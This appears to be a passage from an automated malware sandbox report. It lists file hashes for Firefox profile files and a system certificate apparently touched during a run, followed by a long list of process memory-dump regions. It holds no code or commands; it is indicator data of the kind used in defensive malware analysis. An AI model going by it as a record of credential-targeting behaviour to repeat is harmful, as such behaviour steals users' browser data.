                                                                ab452caa2a529b5bf3874c291f1ffb2a30d9ea43dae5df6a6995dde4bc3506648c749317f0d8e94c31214e62f18f855d933b6d0b6b44634b01e058d3c5fcb499

                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\prefs-1.js

                                                                Filesize

                                                                8KB

                                                                MD5

                                                                0dcec3ef60562807c1bb90fa48f6b09b

                                                                SHA1

                                                                ce3b71840d7bd3d607d3410fcc2d0ae12707adb4

                                                                SHA256

                                                                183a24f5498634f67172f6faa6c64752d1e7ac63d53566ba69897503fe1f48d6

                                                                SHA512

                                                                a4289d90ea5b8523a0087c6e357b9d6ed981afedf755c6778623902bada47f84b62d36c9eaaa34f9641b2fcd89863b35eb1b92e3042888ce7f88208ab4262670

                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\prefs.js

                                                                Filesize

                                                                6KB

                                                                MD5

                                                                7d8d67b01742f61e2474eaf447fab2b5

                                                                SHA1

                                                                1ea143bd0a2bce7d1416e9c5f354268169e6e3fb

                                                                SHA256

                                                                b5475265bcceca2a2a4ea8132a857a0053f487928b2ef6cb28f6d0da63c8f232

                                                                SHA512

                                                                28e6470a389e7dccade9ce729b1fd6bdcf10083828c79aa528a7492ec5ce7dcf915cac338f133bda4b22ef23d1d80524f6848c9565300fee80f6fafc2eafd213

                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\prefs.js

                                                                Filesize

                                                                6KB

                                                                MD5

                                                                1c3c21c4eedc3ea0868da45bf8f6e306

                                                                SHA1

                                                                f39a10f0095dfb75228ad547ee554cab1d86531b

                                                                SHA256

                                                                f3e3af6ebe2e78aeb85477e39562f2c618089b272e2489307126d747a273a60e

                                                                SHA512

                                                                de1545eabd399694827baf5bc0d707139daa4788c334c01521c12346cb8b9b9a0a636928d6508f5a4adbf9dd5d25b79a0eb9f09491066364f58cbb0d094aaa17

                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\prefs.js

                                                                Filesize

                                                                6KB

                                                                MD5

                                                                ee6801cdd54900cac1ec97efd598c6fa

                                                                SHA1

                                                                dee7c9c91aea5ff8017def937e8f1eeec0f94836

                                                                SHA256

                                                                8bb0f598e2e1744188af84f65960c9072aeb8233d6fa86af781effdc7465f69c

                                                                SHA512

                                                                a1df660b6e1b85e3e33b4ea0c4df940df5c40b6de89f4a9c176446fa45f3482f5a8a5d89e724f952c6892cb8be149e816c2b533f9cfce7254ad37e24561b19bf

                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\sessionstore-backups\recovery.baklz4

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                d881ea23acab35265a78a648af64c99d

                                                                SHA1

                                                                7ef8fab9123d0e9d4fc43d2eb9379a99b3f2ec58

                                                                SHA256

                                                                a87e78fb7873d56fab86c68186205cbe96d947fb7f432c15d97a467d444947f0

                                                                SHA512

                                                                469dd6b25f2232a356f79f90ec1ed644e6ef2660bf9c14899bd3bad5debb96e09428a95b38f6f239bf5935b7409243ff5f48668e105b67c6064aab38c2d0d5f6

                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                                                                Filesize

                                                                3.4MB

                                                                MD5

                                                                6fa2135b6deef13dce04979b3d7601b3

                                                                SHA1

                                                                8903108fa8434682a50c2b1c713aa308d90a0c80

                                                                SHA256

                                                                7f7d70adbaa8cdb6116f79cfe25d817edbf673275afbd2f500954b52bec624c4

                                                                SHA512

                                                                73922d42ea4484b36e1fea048c81c5388869cd01254e48458e8c10d7692b733fc3f08213a5bb352b4c76998cf46f3504f3c2ecab79cfe1f0408d7664a4e25ae3

                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                                                                Filesize

                                                                2.2MB

                                                                MD5

                                                                4309cea97056f2144d06a7d71d8aff92

                                                                SHA1

                                                                402bd2280f37890d9630bd499be5687db0d9ffbb

                                                                SHA256

                                                                368e53ab56e5c20810966cd1ee5501763dc3a9141b50bf76b35d895082c89479

                                                                SHA512

                                                                339b01ede149bfb0b1fcc874fec8beccaeeeaf37b71ee6f1233b6d953e371d895a2e3d56dc004acf20ab727dde8d2642389ed819ae58f2ab6d1d5ae0a5278b02

                                                              • C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\456185AA0D7EF9A06E4FA7AE9C5E9263D5653C20

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                9d9aa53343d9e9f884a1548c3020a1da

                                                                SHA1

                                                                63fbe728827912da274db178c967f0474d780b49

                                                                SHA256

                                                                56fa31ae17f00c5a8be7c6cb90419646e6af2c2a070bbc852c907999432acfa1

                                                                SHA512

                                                                deec2f4bbbf612aaf3ff584cb518460ad2c02ebbdac0702a5a1101a203d0d6d57fedafe2496ee86429f35537e88a75516f86be0bffa9cf5869bba92c07582994

                                                              • memory/384-120-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                Filesize

                                                                184KB

                                                              • memory/384-196-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                Filesize

                                                                184KB

                                                              • memory/384-123-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                Filesize

                                                                184KB

                                                              • memory/384-165-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                Filesize

                                                                184KB

                                                              • memory/384-736-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                Filesize

                                                                184KB

                                                              • memory/384-171-0x0000000010000000-0x000000001001C000-memory.dmp

                                                                Filesize

                                                                112KB

                                                              • memory/408-1431-0x0000000000400000-0x0000000000466000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/408-1430-0x0000000000400000-0x0000000000466000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/1748-613-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                Filesize

                                                                184KB

                                                              • memory/1748-145-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                Filesize

                                                                184KB

                                                              • memory/1748-147-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                Filesize

                                                                184KB

                                                              • memory/1748-1405-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                Filesize

                                                                184KB

                                                              • memory/1748-195-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                Filesize

                                                                184KB

                                                              • memory/1748-1079-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                Filesize

                                                                184KB

                                                              • memory/2020-143-0x0000000000400000-0x0000000000CCE000-memory.dmp

                                                                Filesize

                                                                8.8MB

                                                              • memory/2020-149-0x0000000000400000-0x0000000000CCE000-memory.dmp

                                                                Filesize

                                                                8.8MB

                                                              • memory/2652-19-0x00000000076A0000-0x0000000007D1A000-memory.dmp

                                                                Filesize

                                                                6.5MB

                                                              • memory/2652-16-0x0000000005970000-0x0000000005CC4000-memory.dmp

                                                                Filesize

                                                                3.3MB

                                                              • memory/2652-4-0x00000000050D0000-0x00000000050F2000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2652-20-0x00000000064B0000-0x00000000064CA000-memory.dmp

                                                                Filesize

                                                                104KB

                                                              • memory/2652-5-0x0000000005870000-0x00000000058D6000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/2652-2-0x0000000002980000-0x00000000029B6000-memory.dmp

                                                                Filesize

                                                                216KB

                                                              • memory/2652-18-0x0000000006370000-0x00000000063BC000-memory.dmp

                                                                Filesize

                                                                304KB

                                                              • memory/2652-22-0x00000000074C0000-0x0000000007556000-memory.dmp

                                                                Filesize

                                                                600KB

                                                              • memory/2652-3-0x0000000005110000-0x0000000005738000-memory.dmp

                                                                Filesize

                                                                6.2MB

                                                              • memory/2652-17-0x0000000005F70000-0x0000000005F8E000-memory.dmp

                                                                Filesize

                                                                120KB

                                                              • memory/2652-24-0x00000000082D0000-0x0000000008874000-memory.dmp

                                                                Filesize

                                                                5.6MB

                                                              • memory/2652-23-0x0000000007450000-0x0000000007472000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2652-6-0x00000000058E0000-0x0000000005946000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/2812-739-0x00000000051D0000-0x0000000005294000-memory.dmp

                                                                Filesize

                                                                784KB

                                                              • memory/2812-646-0x0000000002780000-0x000000000279E000-memory.dmp

                                                                Filesize

                                                                120KB

                                                              • memory/2812-738-0x0000000005010000-0x0000000005066000-memory.dmp

                                                                Filesize

                                                                344KB

                                                              • memory/2812-102-0x0000000004D90000-0x0000000004E06000-memory.dmp

                                                                Filesize

                                                                472KB

                                                              • memory/2812-101-0x0000000000270000-0x000000000054A000-memory.dmp

                                                                Filesize

                                                                2.9MB

                                                              • memory/3152-664-0x0000000000A50000-0x0000000000E9C000-memory.dmp

                                                                Filesize

                                                                4.3MB

                                                              • memory/3152-670-0x0000000000A50000-0x0000000000E9C000-memory.dmp

                                                                Filesize

                                                                4.3MB

                                                              • memory/3152-259-0x0000000000A50000-0x0000000000E9C000-memory.dmp

                                                                Filesize

                                                                4.3MB

                                                              • memory/3152-353-0x0000000000A50000-0x0000000000E9C000-memory.dmp

                                                                Filesize

                                                                4.3MB

                                                              • memory/3152-352-0x0000000000A50000-0x0000000000E9C000-memory.dmp

                                                                Filesize

                                                                4.3MB

                                                              • memory/3428-32-0x00000000008B0000-0x0000000000D54000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/3428-45-0x00000000008B0000-0x0000000000D54000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/3620-1453-0x0000000000400000-0x00000000008AF000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/3620-1499-0x0000000000400000-0x00000000008AF000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/3620-1452-0x0000000000400000-0x00000000008AF000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/3620-1485-0x0000000000400000-0x00000000008AF000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/4668-1640-0x0000028D68200000-0x0000028D68206000-memory.dmp

                                                                Filesize

                                                                24KB

                                                              • memory/4668-1641-0x0000028D68210000-0x0000028D6821A000-memory.dmp

                                                                Filesize

                                                                40KB

                                                              • memory/4668-1635-0x0000028D67CB0000-0x0000028D67CBA000-memory.dmp

                                                                Filesize

                                                                40KB

                                                              • memory/4668-1639-0x0000028D681D0000-0x0000028D681D8000-memory.dmp

                                                                Filesize

                                                                32KB

                                                              • memory/4668-1636-0x0000028D681E0000-0x0000028D681FC000-memory.dmp

                                                                Filesize

                                                                112KB

                                                              • memory/4668-1634-0x0000028D682A0000-0x0000028D68355000-memory.dmp

                                                                Filesize

                                                                724KB

                                                              • memory/4668-1633-0x0000028D681A0000-0x0000028D681BC000-memory.dmp

                                                                Filesize

                                                                112KB

                                                              • memory/4668-1637-0x0000028D681C0000-0x0000028D681CA000-memory.dmp

                                                                Filesize

                                                                40KB

                                                              • memory/4668-1638-0x0000028D68360000-0x0000028D6837A000-memory.dmp

                                                                Filesize

                                                                104KB

                                                              • memory/4740-124-0x0000000000400000-0x00000000009F2000-memory.dmp

                                                                Filesize

                                                                5.9MB

                                                              • memory/4996-1533-0x0000000000490000-0x0000000000B9E000-memory.dmp

                                                                Filesize

                                                                7.1MB

                                                              • memory/4996-1540-0x0000000000490000-0x0000000000B9E000-memory.dmp

                                                                Filesize

                                                                7.1MB

                                                              • memory/5168-1482-0x0000000000B50000-0x0000000000BB6000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/5168-1481-0x0000000000B50000-0x0000000000BB6000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/5168-1478-0x0000000000B50000-0x0000000000BB6000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/5168-1479-0x0000000000B50000-0x0000000000BB6000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/5168-1480-0x0000000000B50000-0x0000000000BB6000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/5480-640-0x0000000000400000-0x0000000000466000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/5480-641-0x0000000000400000-0x0000000000466000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/5492-193-0x00007FF6E77A0000-0x00007FF6E7E2B000-memory.dmp

                                                                Filesize

                                                                6.5MB

                                                              • memory/5492-190-0x00007FF6E77A0000-0x00007FF6E7E2B000-memory.dmp

                                                                Filesize

                                                                6.5MB

                                                              • memory/5504-1411-0x0000000002B70000-0x0000000002B73000-memory.dmp

                                                                Filesize

                                                                12KB

                                                              • memory/5504-1412-0x0000000002C80000-0x0000000002CE9000-memory.dmp

                                                                Filesize

                                                                420KB

                                                              • memory/5504-1408-0x0000000002790000-0x00000000027D9000-memory.dmp

                                                                Filesize

                                                                292KB

                                                              • memory/6024-1565-0x000001DBC82C0000-0x000001DBC82E2000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/6024-1567-0x000001DBC87A0000-0x000001DBC8816000-memory.dmp

                                                                Filesize

                                                                472KB

                                                              • memory/6024-1566-0x000001DBC86D0000-0x000001DBC8714000-memory.dmp

                                                                Filesize

                                                                272KB

                                                              • memory/6088-168-0x0000000000020000-0x00000000004D2000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/6088-166-0x0000000000020000-0x00000000004D2000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/6124-215-0x00000000004A0000-0x0000000000944000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/6124-79-0x00000000004A0000-0x0000000000944000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/6124-737-0x00000000004A0000-0x0000000000944000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/6124-687-0x00000000004A0000-0x0000000000944000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/6124-644-0x00000000004A0000-0x0000000000944000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/6124-1249-0x00000000004A0000-0x0000000000944000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/6124-47-0x00000000004A0000-0x0000000000944000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/6124-1501-0x00000000004A0000-0x0000000000944000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/6124-1429-0x00000000004A0000-0x0000000000944000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/6124-1454-0x00000000004A0000-0x0000000000944000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/6124-164-0x00000000004A0000-0x0000000000944000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/6124-125-0x00000000004A0000-0x0000000000944000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/6124-103-0x00000000004A0000-0x0000000000944000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/6516-1483-0x00000000004A0000-0x0000000000944000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/6516-1484-0x00000000004A0000-0x0000000000944000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/6596-1468-0x0000000006270000-0x00000000065C4000-memory.dmp

                                                                Filesize

                                                                3.3MB

                                                              • memory/6596-1476-0x0000000006E80000-0x0000000006ECC000-memory.dmp

                                                                Filesize

                                                                304KB

                                                              • memory/6736-566-0x00000000004A0000-0x0000000000944000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/6736-595-0x00000000004A0000-0x0000000000944000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/6992-1515-0x0000000000400000-0x0000000000466000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/6992-1516-0x0000000000400000-0x0000000000466000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/7092-1527-0x00007FF798720000-0x00007FF798A95000-memory.dmp

                                                                Filesize

                                                                3.5MB

                                                              • memory/7112-1498-0x0000000000B10000-0x0000000000FB0000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/7112-1500-0x0000000000B10000-0x0000000000FB0000-memory.dmp

                                                                Filesize

                                                                4.6MB